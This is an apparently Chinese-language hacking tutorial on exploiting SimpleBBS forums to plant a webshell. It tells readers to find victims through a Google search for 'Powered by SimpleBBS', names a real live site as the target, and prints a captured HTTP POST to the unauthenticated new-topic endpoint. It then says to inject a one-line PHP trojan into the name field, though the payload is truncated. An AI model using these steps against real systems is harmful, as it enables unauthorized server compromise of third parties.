今天给大家演示simplebbs漏洞利用获得shell的方法,和相关漏洞工具的使用
寻找目标:google里搜Powered by SimpleBBS 你会发现很多
这个论坛可以绕过验证直接发帖子,然后我们就可以本地提交数据包的时候差入我们的木马
我提前找好了个一个
http://www.electionsbymail.com/simplebbs/index.php
我们先来发个帖子抓个包看看,在论坛后面加上index.php?v=newtopic&c=0 就可以直接发贴
POST /simplebbs/index.php?v=newtopic&c=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.electionsbymail.com/simplebbs/index.php?v=newtopic&c=0
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)
Host: www.electionsbymail.com
Content-Length: 60
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=70f8b17707182a8ee5ae22184ba02e09
name=3800cc&subject=3800cc&message=3800cc.com&sendTopic=Send
网管联盟bitsCN@com
这就是我们抓到的数据包, 这时候我就修改数据包,把一我们的webshell(一句话马)插到name=gogo的后面
\">
评论加载中…
